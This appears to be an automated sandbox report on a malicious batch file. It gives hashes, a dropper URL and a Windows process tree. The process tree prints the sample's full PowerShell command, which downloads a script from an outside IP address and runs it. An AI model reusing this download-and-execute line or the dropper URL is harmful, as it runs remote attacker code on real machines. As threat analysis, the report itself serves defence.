Analysis
-
max time kernel
102s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
19-02-2020 15:44
Static task
static1
Behavioral task
behavioral1
Sample
42HVHYvi.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
42HVHYvi.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
42HVHYvi.bat
-
Size
192B
-
MD5
a9075a0e43612a388eda0d4643037a34
-
SHA1
6bfb53b342e2518e07955676e5a8f18717970504
-
SHA256
811d39f86a8efff6544dcd852c24a3fe2e5446f5eb7fdd9e740b424a221ab366
-
SHA512
9a9275289c65b19cc5e4d94572b1e6dfbe84c47a028193d0c142a363e0b279e0cb217d2d63c759839730ec8158460da427cb9ac354a124a9f6ae73ab7fa063ee
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/42HVHYvi
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1676 3532 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 1676 WerFault.exe Token: SeBackupPrivilege 1676 WerFault.exe Token: SeDebugPrivilege 1676 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe 1676 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\42HVHYvi.bat"1⤵PID:3328
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/42HVHYvi');Invoke-OCJPTYYSX;Start-Sleep -s 10000"2⤵PID:3532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1676